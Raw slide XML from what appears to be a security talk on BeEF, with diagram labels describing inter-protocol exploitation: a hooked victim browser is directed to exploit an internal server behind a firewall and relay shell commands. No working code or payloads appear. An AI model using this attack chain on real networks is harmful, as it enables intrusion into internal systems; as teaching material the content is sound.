            <a:off x="228600" y="1371600"/>
            <a:ext cx="1752600" cy="7381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This example uses the PHP version of BeEF</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54050" y="228600"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF Exploit Module Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1433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1041400"/>
            <a:ext cx="89154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143364" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="814388" y="4875213"/>
            <a:ext cx="1036637" cy="15240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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143365" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-1964626">
            <a:off x="3444875" y="4567238"/>
            <a:ext cx="1006475" cy="625475"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 40228"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143366" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1418428">
            <a:off x="6165850" y="5630863"/>
            <a:ext cx="1006475" cy="625475"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 40228"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143367" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4773613" y="3227388"/>
            <a:ext cx="4125912" cy="2041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3200" b="1" dirty="0"/>
              <a:t>Additional exploit modules can be added from Metasploit.</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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="77450"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>BeEF Inter-Protocol </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploitation (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Content Placeholder 85"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3083" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4598988" y="3454400"/>
            <a:ext cx="73025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084" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3876675" y="2921000"/>
            <a:ext cx="722313" cy="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085" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4598988" y="2319338"/>
            <a:ext cx="0" cy="2255837"/>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086" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3232150" y="4252913"/>
            <a:ext cx="298291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087" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4044950" y="4687888"/>
            <a:ext cx="1173163"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Firewall</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Infrastructure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3074" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4200525" y="3800475"/>
          <a:ext cx="857250" cy="900113"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s271635" name="Clip" r:id="rId4" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="3135086" imgH="3278319"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0525" y="3800475"/>
                        <a:ext cx="857250" cy="90011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88" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="3035300"/>
            <a:ext cx="504825"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DNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3075" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4933950" y="2935288"/>
          <a:ext cx="857250" cy="900112"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s271636" name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="3135086" imgH="3278319"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3950" y="2935288"/>
                        <a:ext cx="857250"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89" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3517900" y="2254250"/>
            <a:ext cx="663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Web </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3076" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3419475" y="2640013"/>
          <a:ext cx="860425" cy="900112"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s271637" name="Clip" r:id="rId7" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId7" imgW="3135086" imgH="3278319" progId="">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2640013"/>
                        <a:ext cx="860425"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90" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="469900" y="3073400"/>
            <a:ext cx="2903538" cy="2874963"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41852"/>
              <a:gd name="adj2" fmla="val -28134"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>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b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3091" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="5568950" y="3262313"/>
            <a:ext cx="2535238" cy="2185987"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39667"/>
              <a:gd name="adj2" fmla="val 20880"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="33CCFF"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3077" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7504113" y="4451350"/>
          <a:ext cx="862012" cy="900113"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s271638" name="Clip" r:id="rId8" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId8" imgW="3135086" imgH="3278319"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4113" y="4451350"/>
                        <a:ext cx="862012" cy="90011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3092" name="Group 16"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="333375" y="2921000"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="3081" name="Object 9"/>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71639" name="Clip" r:id="rId9" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId9" imgW="3135086" imgH="3278319" progId="">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133" name="Rectangle 1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3134" name="Group 19"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3135" name="Freeform 2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36" name="Freeform 2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37" name="Freeform 2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38" name="Freeform 2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39" name="Freeform 2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40" name="Freeform 2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41" name="Freeform 2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42" name="Freeform 2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43" name="Freeform 2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44" name="Freeform 2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45" name="Freeform 3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46" name="Freeform 3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47" name="Freeform 3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48" name="Freeform 3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49" name="Freeform 3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50" name="Freeform 3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51" name="Freeform 3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52" name="Freeform 3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53" name="Freeform 3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54" name="Freeform 3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55" name="Freeform 4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56" name="Freeform 4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57" name="Freeform 4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3093" name="Text Box 43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7637463" y="5378450"/>
            <a:ext cx="612775"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Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3078" name="Object 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6680200" y="2668588"/>
          <a:ext cx="857250" cy="900112"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s271640" name="Clip" r:id="rId10" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId10" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0"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0200" y="2668588"/>
                        <a:ext cx="857250"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94" name="Text Box 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="2354263"/>
            <a:ext cx="1262062"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Internal Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3095" name="Text Box 46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="149225" y="1943100"/>
            <a:ext cx="1387475" cy="11699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7. Send shell commands to execute on internal server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3096" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="2387600"/>
            <a:ext cx="73025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097" name="Text Box 49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5549900" y="1968500"/>
            <a:ext cx="484188"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Mail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3079" name="Object 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4906963" y="1868488"/>
          <a:ext cx="857250" cy="900112"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s271641" name="Clip" r:id="rId11" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId11" imgW="3135086" imgH="3278319" progId="">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6963" y="1868488"/>
                        <a:ext cx="857250"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98" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6570663" y="3697288"/>
            <a:ext cx="1036637" cy="682625"/>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6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Exploit internal server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3099" name="Group 52"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="546100" y="4819650"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="3080" name="Object 8"/>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71642" name="Clip" r:id="rId12" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId12" imgW="3135086" imgH="3278319" progId="">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108" name="Rectangle 54"/>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3109" name="Group 55"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3110" name="Freeform 56"/>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1" name="Freeform 57"/>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2" name="Freeform 58"/>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3" name="Freeform 59"/>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4" name="Freeform 60"/>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5" name="Freeform 61"/>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6" name="Freeform 62"/>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7" name="Freeform 63"/>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8" name="Freeform 64"/>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19" name="Freeform 65"/>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0" name="Freeform 66"/>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1" name="Freeform 67"/>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2" name="Freeform 68"/>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3" name="Freeform 69"/>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4" name="Freeform 70"/>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5" name="Freeform 71"/>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6" name="Freeform 72"/>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7" name="Freeform 73"/>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8" name="Freeform 74"/>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29" name="Freeform 75"/>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30" name="Freeform 76"/>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31" name="Freeform 77"/>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32" name="Freeform 78"/>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3100" name="Text Box 79"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="6096000"/>
            <a:ext cx="1344613"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BeEF Controller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3101" name="Text Box 81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1082675" y="3776663"/>
            <a:ext cx="1752600" cy="1381125"/>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5. Attacker uses BeEF controller to tell victim browser to exploit internal server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3102" name="Freeform 83"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="460375" y="4017963"/>
            <a:ext cx="7235825" cy="1441450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 4558"/>
              <a:gd name="T1" fmla="*/ 0 h 908"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 4558"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 908"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 4558"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 908"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 4558"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 908"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 4558"/>
              <a:gd name="T13" fmla="*/ 0 h 908"/>
              <a:gd name="T14" fmla="*/ 4558 w 4558"/>
              <a:gd name="T15" fmla="*/ 908 h 908"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="4558" h="908">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="100" y="419"/>
                  <a:pt x="0" y="838"/>
                  <a:pt x="382" y="873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="764" y="908"/>
                  <a:pt x="1798" y="278"/>
                  <a:pt x="2494" y="211"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3190" y="144"/>
                  <a:pt x="3874" y="307"/>
                  <a:pt x="4558" y="470"/>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3103" name="Line 84"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7315200" y="3514725"/>
            <a:ext cx="533400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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3104" name="Freeform 85"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="3255963"/>
            <a:ext cx="7964488" cy="2455862"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 5017"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 1547"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 5017"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1547"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 5017"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1547"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 5017"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 1547"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 5017"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 1547"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 5017"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 1547"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 5017"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 1547"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 5017"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 1547"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 5017"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 1547"/>
